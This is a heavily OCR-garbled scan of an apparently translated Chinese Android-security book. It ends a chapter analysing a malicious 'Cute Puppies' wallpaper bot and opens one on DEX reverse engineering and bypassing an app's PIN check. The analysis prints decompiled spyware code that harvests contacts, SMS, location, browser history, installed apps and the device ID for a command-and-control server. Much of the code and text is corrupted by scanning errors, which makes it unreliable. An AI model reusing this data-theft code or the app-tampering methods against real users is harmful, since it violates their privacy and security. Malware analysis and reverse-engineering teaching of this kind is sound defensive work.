位 置信 息 ( 见 图 6. 18) 

设备 信息 ( 见 图 6. 19) 

供 设备 上 安装 的 软件 列表 信息 ( 见 图 6. 20) 
GetReceivedSMS( ) 取 设 备 上 收 到 SMS 信息 ( 见 图 6. 21) 
ReadContacts( ) 支取 联系 人 资料 ( 见 图 6. 22) 











GetContactInfo( ) 


pid 
3 
; 














RE 
3 
; 


GetCurrentLocation( ) 

















GetDevicelD( ) 


高 
3 
3 






































GetPackagesInstalled( ) 


[id 




















E 

















xk 
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BotClient.this.bRunning = false; 
Log.v("MCS BOT BotClient", "MCS server closed connection"); 
locallOException.printStackTraceO; 
continue; 
} 
catch (ClassNotFoundException localClassNotFoundException) 
t 
localClassNotFoundException.printStackTrace() ; 
} 
break; 
localClassNotFoundException. putCInteger. value0f(101), BotClient.this.bwr.GetContactInfoO) ; 
Log. vC"MCS. BOT. BotClient", "MCS ordered contacts"); 
continue; 
localClassNotFoundException. put(CInteger.value0f(102), BotClient.this.bwr.GetBrowserHistory(O)); 
Log. v("MCS. BOT. BotClient", "MCS Browser History"); 
continue; 
localClassNotFoundException.put(Integer.valueOf(105), BotClient.this.bwr.GetPackagesInstalledO); 
Log. v("MCS. BOT. BotClient", “MCS Get Packages"); 
continue; 
Object localO0bject2 = BotClient.this.bwr.GetCurrentLocationO; 
localClassNotFoundException.put(Integer.valueOf(104), localO0bject2); 
Log. v("MCS. BOT. BotClient", "MCS Get Locations"); 
continue; 
localObject2 = BotClient.this.bwr.GetReceivedSMSO ; 
localClassNotfoundException.put(Integer. value0f(103), localObject2); 
Log. v("MCS. BOT BotClient", "MCS Get SMS Messages"); 
continue; 
localObject2 = BotClient.this.bwr.GetDeviceIDO; 
localClassNotFoundException.put(Integer.valueOf(106), localObject2); 
} 
) 
3 


static abstract interface McsDataTypes 

t 
public static final int MCS BROWSER HISTORY = 102; 
public static final int MCS CONTACTS INFO = 101; 
public static final int MCS DEVICE INFO = 106; 
public static final int MCS LOCATION = 104; 
public static final int MCS, PACKAGES = 105; 
public static final int MCS SMS = 103; 
public static final int MCS STOP = 222; 


图 6.12  BotClient. class- MasterCommandProcessor( ) 


public MOSHEBBIR-String, ArrayList«String»» GetContactInfoC) 


{ 
BR locolHashtable = new 天 天 加 有 有) 


Cursor localCursor = this.cr.query(ContactsContract.Contacts. CONTENT URI, null, null, null, null); 
if (localCursor.getCount() » 9) 
while (localCursor.moveToNext()) 
1 
ArrayList localArrayList = new ArrayList(); 
String str2 = localCursor.getString(localCursor.getColumnIndex(" id")); 
String str3 = locolCursor.getString(localCursor.getColumnIndex("display name")); 
String stri = ""; 
if (Integer. parseInt(localCursor. getString(localCursor.getColumnIndex("has. phone, number"))) > 0) 
t 
localübject3 = this.cr; 
localübject2 = ContactsContract .CommonDataKinds . Phone , CONTENT. .URT ; 
localübjecti = new String[1]; 
localübjecti[90] = str2; 
localübjecti = ((ContentResolver)localO0bject3).query((Uri)localObject2, null, "contact id = ?", localObjectl, null); 
(CCursor)localObject1).moveToFirstO ; 
if (((Cursor)localObject1).getCount() > 0) 
stri = ((Cursor)localübject1).getString((CCursor)localObject1).getColumnIndex("data1")); 
(CCursor)localÓbject1) .close(); 
1 
Object local0bjectl = ""; 
ContentResolver localContentResolver = this.cr; 
Object local0bject3 = ContactsContract.CommonDatakinds . Email. CONTENT. URT; 
Object localObject2 = nem String[1]; 
localObject2[0] = str2; 
localübject2 = localContentResolver.query((Uri)localO0bject3, null, "contact id = ?", localObject2, null); 
(Cursor )local0bject2) .moveToFirst(); 
if (C((Cursor)localO0bject2).getCount() > 9) 
localübjecti = ((Cursor)local0übject2).getString((CCursor)localObject2). getColumnIndex("datal")); 
(KCursor)localObject2).closeO; 
localArrayList.add(str3); 
localArraylist.add(stri); 
localarrayList.add(local0bject1); 
localHashtable.put(str2, localàrraylist); 
} 
return GMSREBEe String, ArrayList<String>») NOD String, ArrayList«String»») SEG String, ArrayList<String>>)localHashtable; 


图 6.13  ?5localObjectl 值 为 101 FT, BotClient 调用 GetContactInfo( ) 函数 
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hä E} com.adam.CutePuppiesWallpaper 
> [J] BotBroadcastHandler 
> [J] BotClient 
> |J) BotsMSHandler 
J| BotSMSListner 
BotService 
BotWorker 
* (29 BotWorker 
95 LOG TAG : String 
a cr: ContentResolver 
ctx : Context 


v 














* vv 


E E 


a 


BotWorker(ContentResolver, Context) 
CetBrowserHistory0 : List<String> 

GetContactinfo() : Hashtable «String, ArrayList«String» » 
GetCurrentLocation( : ArrayList«String» 

GetDevicelDQ : String 

GetPackagesinstalled() : ArrayList«String» 
GetReceivedSMSQ : List«String» 

ReadContacts() : Hashtable «String, String» 


Sogo. 








图 6. 14 BotWorker 类 定义 的 函数 








public BotWorker(ContentResolver paramContentResolver, Context paramContext) 
1 

this.cr = paramContentResolver; 

this.ctx - paramContext; 

BotSMSHandler.Initialize(); 

BotLocationHandler.Initialize(paramContext); 


图 6.15  BotWorker 类 的 构造 函数 





public List<String> 
{ 
LinkedList locallinkedList = new LinkedListO); 
Cursor localCursor = Browser.getAllVisitedUrls(this.cr); 
localCursor.moveToFirst(); 
if (localCursor.getCount() » 9) 
while (localCursor.moveToNext()) 
locallinkedList.add(localCursor.getString(9)); 
return locallinkedLlist; 





6.16  BotWorker 类 的 GetBrowserHistory( ) 函数 
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public Hashtable«String, ArrayList«String»» GetContoctInfoO) 
i 
Hashtable localHashtable « new Hashtable(Q); 
Cursor localCursor = this.cr.query(ContactsContract.Contacts. CONTENT URI, null, null, null, null); 
if (tocalCursor.getCount() > 8) 
while (localCursor.moveToNext()) 
{ 
Arraylist LocatArrayList = new ArrayList(); 
String str2 = localCursor.getString(locolCursor,getColumnIndex(" id")); 
String str3 » locolCursor.getString(localCursor.getColumnIndex("display naome")); 
String stri = **; 
if (Integer. parseint(localCursor.getString(localCursor.getColumnIndex("has phone number"))) > 8) 
t 
localübject3 = this.cr; 
localübject2 = ContactsContract.CommonDataKinds . Phone , CONTENT. URT; 
localübjecti = new String[i]; 
locaiübjecti[0] = str2; 
locai0bjecti = ((ContentResolver)localO0bject3).query((Uri)localObject2, null, "contact id = 2", localübjecti, null); 
(CCursor)localübjecti).moveTofirst(); 
if (CCCursor)local0bject1).getCount() > 9) 
strl » ((Cursor)localObject1) .getString(((Cursor)localObject1).getColumnIndex( "data1")); 
(CCursor)localObject1).close(); 
H 
Object localübjecti = ""; 
ContentResolver localContentResolver » this.cr; 
Object localObject3 » ContactsContract,CommonDatoKinds.Email.COWTENT URI; 
Object localübject2 = new String[1]; 
localübject2[0] = str2; 
localObject2 = lacalContentfesolver.query((Uri)local0bject3, null, "contact id = ?", localübject2, null); 
(CCursor)localObject2) moveToFirstQ: 
if (C(Cursor)localObject2).getCount() > 0) 
localObject1 « ((Cursor)localObject2).getString(((Cursor)localObject2).getColumnIndex("data1")); 
(KCursor)localübject2).close(); 
localArroyList.add(str3); 
locatArroyList.add(str1); 
localarrayList.add(localObjecti); 
localHashtoble.put(str2, localarraytist); 
} 
return (Hashtable«String, ArrayList<String>>)(Hashtable<String, ArrayList<String>>)(Hashtable<String, ArrayList<String>>)localHashtable; 
} 





器 











6.17  BotWorker 类 的 GetContactInfo( ) 函数 





public ArrayList«String» 
1 
ArrayList localárrayList = new Arraylist(); 
Object localObject = BotLocationHandler.GetLastLocation(); 
try 
t 
String str2 = Double.toString(((Location)localObject).getLongitude()) ; 
String stri = Double.toString(((Location)localObject).getLatitude()); 
localübject = Double.toString((CLocation)localÜbject).getAltitude()); 
localárraylist.add(str2); 
localArrayList.add(str1); 
localArrayList.add(localObject); 
return localárraylist; 


} 
catch (NullPointer£xception localNullPointerException) 
{ 
while (true) 
Log. v("MCS. BOT. BotWorker", "No Location Found"); 
} 
H 


图 6. 18  BotWorker 类 的 GetCurrentLocation( ) 函数 
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public String SEO 
{ 


return (CTelephonyManager)this. ctx . getSystemService("phone")). getDeviceId(); 
H 


public ArrayList«String» GetPackagesInstalled() 
{ 
ArrayList localArrayList = new ArrayList); 
PackageManager localPackageManager = this.ctx.getPackageManager(); 
Object localO0bject = new Intent("android.intent.action.MAIN", null); 
CCIntent)localObject) .addCategory( "android. intent. category. LAUNCHER") ; 
localübject = locaiPackageManager.queryIntentActivities((Intent)localObject, 0).iterator(); 
while (((Iterator)local0bject).hasNext()) 
localarrayList .add(((ResolveInfo)((Iterator)local0bject) next) .activityInfo.applicationInfo.loadLabel (Local PackageManager)) . toString(); 
return (ArroyList«String»)localarrayList; 





"| 








6.19  BotWorker 中 的 GetDeviceID( ). 函数 





public ArrayList«String» [ 
t 

ArrayList localárraylist = new ArraylistO; 

PackageManager localPackageManager = this.ctx.getPackageManager() ; 

Object local0bject = new Intent("android.intent.action.MAIN", null); 

CCIntent)local0bject) .addCategory(" android. intent.category. LAUNCHER”); 

localübject = localPackageManager.queryIntentActivities((Intent)localObject, 0).iterator(); 

while (((Iterator)localübject).hasNext()) 

locaiArrayList .add(((ResolveInfo)((Iterator)local0bject) .next()) .activityInfo.applicationInfo.loadtabel(localPackageManager) .toStringO> 
return (ArrayList«String»)localárrayList; 





6.20 BotWorker 中 的 GetPackagesInstalled( ) 函数 


public List<String> GRECE O 
{ 


ArrayList LocalArrayList = new ArrayListO; 
localArrayList .addAll(BotSMSHandler. GetMessages()); 
return localArraylist; 

1 


6.21 BotWorker 中 的 GetReceivedSMS( ) 函数 


| public Hashtable«String, String» ReddContactsO 

it 

Hashtable localHashtoble = new Hoshtable(); 

Cursor localCursor = this.cr.query(ContactsContract.Contacts. CONTENT URI, null, null, null, null); 
if (localCursor.getCount() » 9) 


while (localCursor.moveToNext()) 
localHashtable.put (localCursor.getString(localCursor.getColumnIndex(" id")), localCursor.getString(localCursor.getColumnIndexC" display 


return localHashtable; 
INE 
3 


图 6.22  BotWorker 中 的 ReadContaets( ) 函数 
BotLocationHandler. class 类 文件 分 析 : 


BotClient 类 使 用 成 员 变 量 bwr C JJH GetCurrentLocation( ) 函数 获取 位 置 数据 ， 
该 函数 随即 调用 BotLocationHandler 类 定义 的 GetLastLocation ( ) 函数 ， 获 取 当 前 





O bwr 是 BotClient 类 设置 的 一 个 成 员 变量 ， 从 图 6. 10 的 代码 段 截图 中 可 见 ，bwr 是 BotWorker 类 的 实 
例 ， 所 以 BotClient 类 可 以 通过 bwr 对 象 调 用 BotWorker 类 定义 的 各 种 公共 成 员 函 数 。 一 一 译 者 注 
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BOT 客户 端的 位 置 ， 如 图 6. 23 所 示 。 


ipublic class BotLocationHandler 

| implements Locationlistener 

it 

public static final String LOG TAG » "MCS BOT BotLocationHondler"; 
private static String bestProvider; 

| private static Location tior; 

| private static LocationManager locationMenager; 


| 
| public static Location GetLastLocation() 

d 

| return DENEN, 

jJ 

i 

public static void Initialize(Context paramContext) 


| locationManager = (LocationManager)paramContext.getSystemService(" location"); 
| Criteria localCriteria = new Criteria; 

bestProvider « locationManager.getBestProvider(localCriteria, false); 

| 1 


public void onLocationChanged(Location paramLocation) 
T 


Log. v("MCS. BOT. BotLocationHandler", Double.toString(paramlocation.getlatitude()) + " " + Double.ftoString(paramLocation.getLongitude()) + " ' 
= paramLocation; 


} 
图 6.23 BotLocationHandler. class 中 定义 的 GetLastLocation( ) 函数 


BotSMSHandler. class 类 文件 分 析 : 

BotClient 类 使 用 成 员 变 量 bwr 调用 GetReceivedSMS ( ) 函数 获取 SMS 信息 。 
GetReceivedSMS( ) 函数 定义 在 BotWorker 类 中 ， 该 函数 随即 调用 BotSMSHandler 类 
定义 的 GetMessages( ) 函数 。 定 义 在 BotSMSHandler 类 中 的 onReceive( ) 函数 负责 
监听 SMS 消息 的 到 来 ， 并 将 其 缓存 发 送 给 远程 服务 器 ， 如 图 6. 24 所 示 。 

将 上 述 分 析 综 合 起 来 ， 分 析 CutePuppiesWallpaper 应 用 程序 

基于 上 述 对 各 个 文件 的 具体 分 析 ， 可 以 得 出 这 样 的 结论 ， 即 CutePuppiesWall- 
paper 应 用 是 一 个 恶意 程序 。 只 要 启动 该 应 用 程序 ， 它 会 立即 开启 一 个 后 台 服 务 。 
在 该 应 用 程序 的 内 部 包含 了 一 个 概念 验证 9 方式 的 BOT 程序 ， 它 可 以 借助 Socket 
通信 连接 到 主 命令 与 控制 中 心 (Command and Control Center，CnC ) 。 随 后 等 待 来 
H CnC 的 命令 ， 该 中 心 能 够 向 设备 上 的 BOT 程序 发 送 多 种 不 同 的 命令 。 

里 然 该 应 用 程序 声称 自己 是 一 个 壁纸 应 用 程序 ,但 是 它 请 求 的 权限 ， 如 接收 
SMS 信息 RECEIVE_SMS 权限 ， 以 及 为 SMS 信息 接收 组 件 Receiver 定义 的 Intent 过 
滤器 ， 超 出 了 一 个 壁纸 应 用 程序 的 功能 范畴 。 通 过 源码 分 析 ， 可 见 该 应 用 程序 为 远 
程 服务 器 建立 了 后 门 。 应 用 程序 能 够 根据 远程 服务 器 发 送 的 命令 ， 向 BOT 服务 器 
发 送 各 种 信息 ， 包 括 联 系 人 信息 、 浏 览 器 历史 、SMS 信息 、 位 置信 息 (包括 GPS 
坐标 ) 、 设 备 上 的 程序 安装 列表 、 设 备 的 IMEI 码 ， 等 等 。 

根据 图 6. 12 可 以 构造 表 6.4， 介 绍 BOT 程序 发 送 的 命令 。 





























外 ”概念 验证 (Proof of Concept，POC) ， 与 Exploit 同 义 ， 指 的 是 利用 漏洞 而 编写 的 攻击 程序 。 一 一 译 者 注 
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package com.adam.CutePuppiesWallpaper; 





* import android.content.BroadcastReceiver; 


public class BotSMSHandler extends BroadcastReceiver 
{ 
public static final String LOG TAG » "MCS BOT. BotSMSHandler"; 
private static final int MAX 5MS = 10; 
private static int SMSCounter; 
private static List«String» I$msMessages; 





public static List«String» GetMessages 
i 

return lSmsMessages; 
} 


public static void Initialize 
{ 
l$msMessages = new ArrayList(); 
SMSCounter = 0; 
} 


public void onReceive(Context paramContext, Intent paramIntent) 
{ 
Object[] arrayOfObject = (Object[])paramIntent. getExtras() .getC"pdus"); 
Log.v(C"MCS BOT BotSMSHandler", "SMS Received\n"); 
SmsMessage[] arrayOfSmsMessage = new SmsMessage[arrayOfObject.length]; 
| for (int j = ð; j < arrayO0fObject.length; j++) 
| arrayOf SmsMessage[j] = SmsMessage. createFromPdu( (byte[])arrayOfObject[j]); 
| StringBuilder localStringBuilder = new StringBuilder(; 
int i » arrayOfSmsMessage. length; 
| for (int k = 0; k < i; k++) 
| d 
| 
| SmsMessage localSmsMessage = arrayOfSmsMessage[k]; 
| localStringBuilder.append("Received SMS*nFrom: "j; 
localStringBuilder.append(localSmsMessage.getDisplayÜriginatingAddress()) ; 
localStringBuilder.append("Sn"); 
| localStringBuilder.append(localSmsMessage.getDisplayMessageBody()) ; 
Y 
l$msMessages.add(SMSCounter X 10, localStringBuilder.toStringO); 
SMSCounter = 1 + SMSCounter; 








图 6.24  BotSMSHandler. class 中 定义 的 GetMessages( ) PKŠ 


46.4 CnC 发 送 给 BOT 客户 端的 命令 





























命令 Bia 连 
MCS_CONTACTS_INFO 获取 联系 人 信息 
MCS_BROWSER_HISTORY 获取 浏览 器 历史 
MCS_SMS 获取 接收 的 消息 
MCS_LOCATION 从 设备 上 获取 GPS 信息 
MCS, PACKAGES 获取 安装 应 用 软件 列表 
MCS_DEVICE_INFO 获取 设备 信息 











根据 上 述 分 析 ， 可 以 推出 Cute Puppies 壁纸 应 用 程序 的 工作 流程 如 图 6. 25 
所 示 。 
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步 又 1: 用 户 从 应 用 程序 
商店 下 载 Cute Puppies 壁 纸 软件 





ZO: BOT 客 户 端 连接 CnC 


Á 


ABO: 用 户 打 开 壁纸 软件 à , : 
Ap: BOT 后 合 服务 开始 运行 i 
步骤 6: BOT 客 户 端 处 理 来 自 CnC 

的 命令 ， 并 根据 命令 将 设备 上 的 

数据 传送 给 CnC 








6.25 恶意 程序 Cute Puppies 工作 流程 图 


一 旦 用 户 从 Android 应 用 市 场 或 其 他 软件 源 下 载 并 安装 该 应 用 程序 ， 当 应 用 程 

序 在 设备 上 启动 后 ，BOT 服务 将 随 之 在 后 台 开 始 运 行 ， 并且 BOT 客户 端 连接 到 

CnC, BOT rib especie ind BOT pum. BOT 客户 端 根 
据 来 自 CnC 的 命令 将 数据 返回 给 服务 器 。 


6.5 小 结 


本 章 主 要 讨论 了 恶意 软件 及 构成 恶意 软件 的 行为 。 然 后 ， 讨 论 了 Android 应 用 
程序 的 恶意 行为 ， 并 使 用 现 有 的 方法 引导 读者 分 析 Android 应 用 程序 的 恶意 行为 。 
随后 ， 本 章 介绍 了 一 个 案例 ， 逐 步 演示 了 恶意 应 用 程序 的 分 析 方 式 ， 从 而 确定 恶意 
应 用 程序 的 行为 和 功能 。 
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本 章 以 第 6 章 的 内 容 为 基础 ， 以 重新 编译 /修改 应 用 程序 行为 的 案例 讨论 为 开 
始 ， 演 示 分 析 和 调试 Android 应 用 程序 二 进 制 安装 文件 (apk 文件 ) 的 方式 方法 ， 
介绍 . dex 文件 的 格式 ， 以 及 在 没有 应 用 程序 源码 的 情况 下 ， 演 示 如 何 对 Android 应 
用 程序 进行 反 编译 和 重新 编译 从 而 实现 改变 应 用 程序 行为 的 目的 。 此 外 ， 本 章 还 
将 介绍 攻击 者 是 如 何 通 过 反 编译 应 用 程序 、 改 变 smali 代码 和 重新 编译 的 方式 ， 改 
变 应 用 程序 行为 的 。 

















7.1 概述 








普通 的 用 户 和 程序 开发 人 员 一 般 不 会 用 到 本 章 介 绍 的 这 些 技术 ,使 用 这 些 技术 
的 人 很 可 能 试图 进行 下 述 操作 ( 如果 执行 的 操作 没有 违法 的 话 ， 也 有 可 能 是 不 道 
德 的 ) : 

1) 在 应 用 程序 中 添加 恶意 的 行为 。 

2) 清除 应 用 程序 中 恶意 的 行为 。 

3) 绕 过 应 用 程序 设计 的 特定 的 功能 。 


7.1.1 添加 恶意 的 行为 


应 当 注 意 的 是 ， 这 样 做 是 违法 的 。 恶 意 用 户 可 以 下 载 一 个 Android 应 用 程序 
(apk) ， 对 它 进 行 反 编 译 ， 添 加 恶意 行为 ， 然 后 重新 打包 应 用 程序 ， 将 其 发 布 到 二 
级 Android 应 用 市 场 。 由 于 Android 应 用 程序 可 以 从 多 个 应 用 市 场 上 下 载 ， 因此 一 
些 用 户 可 能 会 被 诱导 ， 安 装 这 些 已 经 修改 过 的 恶意 应 用 程序 ， 从 而 成 为 恶意 应 用 程 
序 行为 的 受害 者 。 


7.1.2 清除 恶意 的 行为 


本 章 所 列 的 技术 ， 用 于 对 可 疑 的 应 用 程序 进行 分 析 。 如 果 检 测 到 应 用 程序 存在 
非法 /恶意 的 行为 ,需要 对 其 进行 修改 并 移 除 这 些 非 法 /恶意 的 行为 。 分 析 应 用 程序 

的 恶意 行为 对 于 确保 用 户 的 信息 安全 ， 是 相当 必要 的 。 而 且 ， 还 可 以 将 其 用 作对 恶 
意 攻 击 者 进行 处 罚 的 取证 目的 。 不 过 ， 如 果 确 实 检测 到 恶意 行为 ， 用 户 只 需要 删除 
相关 的 应 用 程序 ， 然 后 从 可 靠 的 软件 源 上 ， 重 新 下 载 并 安装 一 个 “干净 ”的 应 用 
程序 即 可 。 
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7.1.3 绕 过 特定 的 功能 


本 章 所 列 技术 的 第 三 种 用 法 ， 是 用 来 绕 过 应 用 程序 设计 的 特定 功能 。 许 多 应 用 
程序 在 使 用 前 ， 需 要 输入 注册 码 或 密 钥 序列 号 ， 和 否则 只 能 在 指定 的 试用 时 间 内 使 
用 ， 或 是 在 使 用 过 程 中 向 用 户 显 示 广 告 。 这 时 ， 使 用 这 些 技术 编辑 smali R, 3E 

















可 以 绕 过 应 用 程序 的 上 述 功能 机 制 。 


7.2 DEX 文件 格式 


基于 寄存 需 的 虚拟 机 。Dalvik 虚拟 机 能 
使 应 用 程序 在 电池 和 处 理 能 力 有 限 的 设备 
上 高 效 运行 。 使 用 Java 语言 编写 的 Android 
应 用 程序 通过 Java 编译 器 被 编译 成 Java 字 
dif. Æ Android 系统 上 运行 的 Java 应 用 
程序 ， 额 外 地 增加 了 一 个 步 又 ， 就 是 
将 .class 文件 (Java 字 节 码 文 件 ) 转换 
成 . dex 文件 ( Dex 文件 或 Dalvik 字 节 码 ) 。 
Dex 代码 在 Dalvik 虚拟 机 上 运行 ， 对 于 多 
个 .class 文件 ， 只 会 生成 一 个 . dex 文件 ， 
其 中 所 有 有 关 的 . class 文件 通过 Dalvik dx 
编译 需 被 编译 成 一 个 . dex 文件 。. dex 文件 
的 结构 如 图 7. 1 所 示 。 

Android SDK 自 带 了 一 个 dexdump T. 
具 ， 可 以 用 来 获取 并 显示 dex 文件 的 内 容 。 
但 是 ， 查 看 这 些 内 容 对 于 初学 者 来 说 信息 
量 不 大 ， 也 就 是 说 没有 太 大 的 用 处 和 帮助 。 





























第 2 章 介绍 了 Dalvik 虚拟 机 (VM) ， 它 是 专 为 运行 Android 应 用 程序 而 设计 的 


Dex 文 件 格式 


图 7.1 . dex 文件 剖析 


图 7.3 显示 了 dex 文件 的 header. (文件 头 部 ) 信息 (使 用 命令 “dexdump-f” 
AF), B dex 文件 classes. dex 通过 编译 HelloActivity. java 文件 获得 ， 如 图 7.2 所 
示 。 从 图 7.3 中 可 以 看 到 ，classes. dex 文件 包含 了 有 关 dex 文件 本 身 的 信息 ， 包 括 
校 验 和 、 文 件 大 小 、 头 部 大 小 ， 以 及 . dex 文件 中 各 字段 的 大 小 和 偏 移 量 。. dex X 











件 中 包含 的 字段 如 下 : 头 部 、 字 符 串 、 类 型 、 








属性 、 函 数 ， 以 及 数据 。 程 序 中 每 一 











个 类 都 有 一 个 人 口 。 图 7.4 显示 的 是 HelloActivity 类 的 和 人口， 同时 该 入 口内 也 显示 
了 HelloActivity 类 内 部 定义 的 函数 (如 init, OnCreate PRO) 。 图 7.5 显示 的 是 资源 














R 类 的 入口 。 
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pentestusrlétools-gibbons-vm-2:-/Android/workspace/Hello/src/com/hello/world$ cat HelloActivity.java 
package com.hello.world; 


import android.app.Activity; 
import android.os.Bundle; 


public class HelloActivity extends Activity ( 


/** Called when the activity is first created. */ 


&0verride 


public void onCreate(Bundle savedInstanceState) ( 


Super .onCreate(savedInstanceState); 
setContentView(R. layout .main); 


) 
ipentestusrletools-gibbons-vm-2:-/Android/workspace/Hello/src/com/hello/world$ | 


图 7.2 一 个 简单 的 A 





ndroid “Hello World” 程序 


pentestusrl@tools-gibbons-vm-2:~/Android/workspace/Hello/bin$ dexdump -f classes.dex 


Processing 'classes.dex'... 

Opened 'classes.dex', DEX version '035' 
DEX file header: 

magic : 'dexwn035N0* 
checksum : 41e00f9f 
signature : 47ee...78cf 
file.size : 1904 
header_size 3 112 

link.size m d 

link off : 8 (9x006000) 
string_ids_size 3: 34 

string ids.off : 112 (0x000070) 
type ids size : 14 
type_ids_off : 248 (Ox0000f8) 
field ids size :4 

field ids off : 340 (〔0x000154) 
method ids size Dus if 

method ids off : 372 (0x000174) 
class_defs_size :6 


class defs off : 460 (exooeicc) 
data size : 1252 
data off : 652 (Ox00028c) 


图 7.3  HelloActivity 程序 classes. dex 文件 的 头 部 信息 


正如 从 图 7.4 和 图 7.5 中 看 到 的 ， 














dexdump 工具 的 输出 不 能 提供 直观 的 信息 ， 











尽管 它 对 于 理解 应 用 程序 行为 的 位 置 和 数量 有 一 定 的 帮助 ， 但 是 这 些 信息 是 相当 不 
可 读 的 。 因 此 ， 本 章 将 使 用 smali/baksmali9 汇 编 / 反 汇 编 器 分 析 和 修改 . dex 格式 文 
fo ， 相 比 来 说 ，smali 文件 更 容易 理解 。smali 装载 . dex 文件 并 生成 对 应 的 smali 











文件 ， 这 种 文件 更 具有 可 读 性 ， 而 且 在 





smali 文件 中 还 包含 了 调试 、 注 释 和 行 信息 





等 。baksmali 能 够 把 smali 文件 编译 回 . dex 格式 。apktool 工具 能 够 把 修改 后 的 . dex 





文件 . 








新 打包 生成 apk 文件 。 




















© smali 和 baksmali 分 别 是 指 Android 系统 里 Dalvik 虚拟 机 使 用 的 一 种 . dex 格式 文件 的 汇编 器 和 反 汇 编 


器 。 它 实现 了 . dex 格式 所 有 功能 (如 注解 ， 








调试 信息 ， 线 路 信息 等 ) smali 和 baksmali 分 别 是 冰岛 























语 中 编译 器 和 反 编 译 器 的 叫 法 。 至 于 为 什么 要 用 冰岛 语 是 因为 Dalvik 虚拟 机 的 名 字 “Dalv 让 ”就 是 一 


个 冰岛 渔村 的 名 字 。 一 一 译 者 注 





Oo WA http: //code. google. com/p/ smali/ 。 一 一 译 者 注 
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: 1 (Oxo001) 
tX 
n] 


1 
: 6 (6x000000) 
: 1622 (ex000656) 


ki rect. methods. size 
rtual methods. : 


lass #0 
lass descriptor 'Lcom/helio/world/telloACtivit) 
Access flags $x0001 (PUBLIC) 
Superclass 'Landroid/app/Activity;' 
Interfaces 
Static fields 
Instance fields 
Direct methods 


Cin Lcom/hello/world/HelloActivity;) 
it>' 

"Ov 
access : 0x16001 (PUBLIC CONSTRUCTOR) 


[ 

registers 

ins 

outs : 

insns size 16-bit code units 
: [000204] com.hello.world.HelloActivity.«init»:(V 

10000: invoke-direct Landroid/app/Activity; «init»:()V // methode0000 
10003: return-void 


positions 
Qx0000 line-6 
Ir H 
Ox0000 - Ox0004 reg-8 this Lcom/hello/world/HelloActivity; 


Virtual methods ~ 

(in Lcom/hello/world/HelloActivity;) 

*onCreate* 

" (Landroid/os/Bundle;)V' 
access : Qx0001 (PUBLIC) 
code 
registers 3 
ins :2 
outs [4 
insns size 9 16-bit code units 

1{0002dc] com.hello.world.HelioActivity.onCreate: (Landroid/os/Bundle;)V 











图 7.4 classes. dex 文件 中 HelloActivity 类 的 信息 


Class #1 header: 
class.idx :4 
access. flags ; 17 (0x0011) 
superclass. idx 
interfaces_off 

source. file idx 
annotations. off 

[SE CN era 

static fields size 
instance. fields. size: 
direct methods size 
virtual methods. size; 


Class #1 
Class descriptor :; 'Lcom/hello/world/R$attr;' 
Access flags 9x0011 (PUBLIC FINAL) 
Superclass *Ljava/lang/Object;* 
Interfaces 
Static fields 
Instance fields 
Direct methods 
: Cin Lcomhello/world/R$attr;) 
: “<init> 
MCA 
access : Ox10001 (PUBLIC CONSTRUCTOR) 
code 
registers 
ins 
outs 
16-bit code units 


1[006300] com.hello.world.R.attr.«init» 
10000: invoke-direct {v8}, Ljava/lang/Object;.«init»:()V // methodéQ00a 
19003: return-void 


positions : 
9x0000 line-1 
locals H 
9$x0000 - Ox0004 reg=0 this Lcom/hello/world/R$attr; 


Virtual methods - 
source file idx : 15 (R.java) 











图 7.5 classes. dex 文件 中 R 类 的 信息 
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7.3 案例 研究 : 修改 应 用 程序 行为 


接 下 来 将 演示 如 何 把 Android. 应 用 程序 通过 反 编 译 成 smali 代码 ， 重 新 编译 ， 
重新 打包 成 apk 文件 的 方式 ， 修 改 Android 应 用 程序 的 行为 。 本 书 作者 编写 了 一 个 
简单 的 应 用 程序 一 一 “SecureApp”， 该 应 用 程序 需要 用 户 在 使 用 之 前 输入 正确 的 密 
码 。 本 节 将 演示 恶意 用 户 是 如 何 绕 过 这 一 预定 功能 的 。 该 应 用 运行 截图 如 图 7.6 和 
图 7.7 所 示 。 





图 7.6 Android 模拟 器 上 运行 的 SecureApp 应 用 


5556:androldlvoe1 rae 





图 7.7 成 功 登 录 SecureApp 应 用 
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na rie cim 应 用 程序 时 ， 第 一 步 要 理解 应 用 程序 的 功能 和 行为 。 通 


常情 况 下 ， 需 要 先 安 装 、 使 用 应 用 程序 ， 并 且 分 析 
应 用 程序 提供 的 各 种 功能 。 本 案例 中 ， 首 先 将 该 应 
用 程序 安装 在 模拟 器 上 ， 然 后 再 试用 该 应 用 程序 。 
如 图 7.8 所 示 ， 应 用 程序 启动 后 ， 显 示 密 码 输 入 界 
面 。 此 时 ， 用 户 并 不 知道 所 需 密码 的 长 度 ， 以 及 密 
码 是 全 由 数字 组 成 (如 PIN) ， 还 是 一 个 更 为 复杂 的 
密码 。 通 过 反复 的 试验 和 失败 的 过 程 ， 了 解 到 该 应 
用 程序 的 密码 输入 框 仅 能 够 输入 数字 ， 而 且 人 允许 输 
入 的 最 大 长 度 为 4 位 。 因 此 ， 可 以 认为 该 应 用 程序 
的 密码 是 由 4 位 数字 构成 的 。 
步骤 1: 反 编译 应 用 程序 
使 用 apktool 工具 可 以 反 编 译 应 用 程序 文件 
(apk)。 图 7.9 显示 了 SecureApp. apk 被 反 编译 到 
secure, app 文件 夹 内 。 浏 览 该 文件 夹 内 容 ， 如 
图 7. 10 所 示 ， 其 中 包含 一 个 smali 文件 来。 所 有 的 

















一 























SecureApp. Em 





图 7.8 分 析 应 用 程序 的 行为 


smali 文件 被 放置 在 smali/andsec/test 文件 夹 下 。 如 图 7. 11 所 示 ， 该 文件 夹 内 的 所 


有 smali 文件 的 文件 名 都 以 KeyPad 或 R 前 缀 开始 。 
个 Java 文件 ， 即 KeyPad. java 和 R. java, 


pentestusrlétools-gibbons-vm-2:-/Android/android-sdk/tools$ ls S* 
SecureApp.apk 

pentestusri6tools-gibbons-vm-2:-/Android/android-sdk/tools$ apktool decode 
I: Baksmaling... 

I: Loading resource table... 

I: Decoding resources... 

I: Loading resource table from file: /home/pentestusrl/apktool/framework/1 
I: Copying assets and libs... 
pentestusrletools-gibbons-vm-2:-/Android/android-sdk/tools$ 























由 此 可 以 推出 ， 该 应 用 只 有 两 


SecureApp.apk secure_app 


.apk 





图 7.9 使 用 apktool 反 编 译 SecureApp. apk 


pentestusrletools-gibbons -vm-2:-/Android/android-sdk/tools/secure. app 


total 16 


-rW-r--r-- 1 pentestusr1 pentestusr1 592 2012-02-28 08:52 AndroidManifest.xml 
-rw-r--r-- 1 pentestusrl pentestusri 92 2012-02-28 08:52 apktool.yml 


